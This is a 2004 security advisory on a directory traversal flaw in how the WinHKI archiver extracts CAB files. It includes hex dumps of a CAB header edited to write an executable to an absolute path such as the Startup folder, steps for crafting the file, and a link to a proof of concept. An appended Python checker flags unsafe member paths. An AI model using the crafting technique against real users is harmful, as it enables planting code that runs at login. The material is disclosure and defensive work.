From: theinsider at 012.net.il (Rafel Ivgi, The-Insider)
Subject: WinHKI - CAB File Directory Transversal

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Application:    WinHKI
Vendors:        http://www.webtoolmaster.com
Versions:       1.4d
Platforms:      Windows
Bug:            CAB File Directory Traversal
Exploitation:   Local (extract file)
Date:           24 Dec 2004
Author:         Rafel Ivgi, The-Insider
E-Mail:         the_insider@...l.com
Website:        http://theinsider.deep-ice.com
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

1) Introduction
2) Bug
3) The Code

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

===============
1) Introduction
===============

WinHKI is a file archiver which supports BH, CAB, HKI, JAR, LHA, TAR
and GZ compression.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

======
2) Bug
======

This is a normal CAB compressed file header:

00000000  4D53 4346 0000 0000 0E30 0F00 0000 0000  MSCF.....0......
00000010  2C00 0000 0000 0000 0301 0100 0100 0000  ,...............
00000020  0000 0000 5800 0000 2000 0100 C8EE 0F00  ....X... .......
00000030  0000 0000 0000 0C2F CC61 2000 7356 5656  ......./.a .sVVV
00000040  5656 5656 5656 5656 5656 5656 5656 5656  VVVVVVVVVVVVVVVV
00000050  5670 352E 6578 6500 5D5B 7CBC 2742 0080  Vp5.exe.][|.'B..
00000060  434B EC5A 7F54 5457 7E7F 33CC C000 036F  CK.Z.TTW~.3....o

In the following modified header, we can see how easy it is to change
the path to anywhere we want, including the All Users Startup folder:

00000000  4D53 4346 0000 0000 0E30 0F00 0000 0000  MSCF.....0......
00000010  2C00 0000 0000 0000 0301 0100 0100 0000  ,...............
00000020  0000 0000 5800 0000 2000 0100 C8EE 0F00  ....X... .......
00000030  0000 0000 0000 0C2F CC61 2000 433A 5C56  ......./.a .C:\V
00000040  5656 5656 5656 5656 5656 5656 5656 5656  VVVVVVVVVVVVVVVV
00000050  5670 352E 6578 6500 5D5B 7CBC 2742 0080  Vp5.exe.][|.'B..
00000060  434B EC5A 7F54 5457 7E7F 33CC C000 036F  CK.Z.TTW~.3....o

All we need to do is CAB-compress (using Microsoft's "makecab" or
WinAce) a file with a long name/path and change the path specified
inside the file to whatever we want. Using any hex editor such as
HexWorkshop, just add anything to the filename.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

===========
3) The Code
===========

An online proof of concept can be found at:
http://theinsider.web1000.com/hki transversal.cab

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

---
Rafel Ivgi, The-Insider
http://theinsider.deep-ice.com

"Scripts and Codes will make me D.O.S , but they will never HACK me."
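
A pre-extraction check for the issue described above, as an added example that is not part of the original advisory: it reads the file names stored in a cabinet's CFFILE entries and flags any that are rooted, drive-qualified or contain a ".." component. The function names are hypothetical, the sample input is the first 0x58 bytes of the two dumps shown in the advisory, and the field offsets follow Microsoft's published cabinet format.

```python
import struct

def cab_member_names(cab):
    """Return the stored file names (szName) from a cabinet's CFFILE entries."""
    if cab[:4] != b"MSCF":
        raise ValueError("not a cabinet file")
    coff_files, = struct.unpack_from("<I", cab, 0x10)  # offset of first CFFILE
    c_files, = struct.unpack_from("<H", cab, 0x1C)     # number of CFFILE entries
    names, pos = [], coff_files
    for _ in range(c_files):
        pos += 16                        # skip the fixed-size CFFILE fields
        end = cab.index(b"\0", pos)      # szName is NUL-terminated
        names.append(cab[pos:end].decode("latin-1"))
        pos = end + 1
    return names

def is_unsafe_name(name):
    """True if extracting `name` could write outside the chosen target folder."""
    norm = name.replace("/", "\\")
    return (
        norm.startswith("\\")                    # rooted or UNC path
        or (len(norm) > 1 and norm[1] == ":")    # drive-qualified, e.g. C:\...
        or ".." in norm.split("\\")              # parent-directory component
    )

def unsafe_members(cab):
    """Names an extractor should refuse or re-root before writing anything."""
    return [n for n in cab_member_names(cab) if is_unsafe_name(n)]

# Sample input built from the advisory's dumps (header, folder and file
# entries only; the compressed data is not needed to read the names).
_TEMPLATE = (
    "4D53 4346 0000 0000 0E30 0F00 0000 0000 "
    "2C00 0000 0000 0000 0301 0100 0100 0000 "
    "0000 0000 5800 0000 2000 0100 C8EE 0F00 "
    "0000 0000 0000 0C2F CC61 2000 {name_start} "
    "5656 5656 5656 5656 5656 5656 5656 5656 "
    "5670 352E 6578 6500"
)
NORMAL = bytes.fromhex(_TEMPLATE.format(name_start="7356 5656"))
MODIFIED = bytes.fromhex(_TEMPLATE.format(name_start="433A 5C56"))

if __name__ == "__main__":
    for label, cab in (("normal", NORMAL), ("modified", MODIFIED)):
        print(label, cab_member_names(cab), "unsafe:", unsafe_members(cab))
```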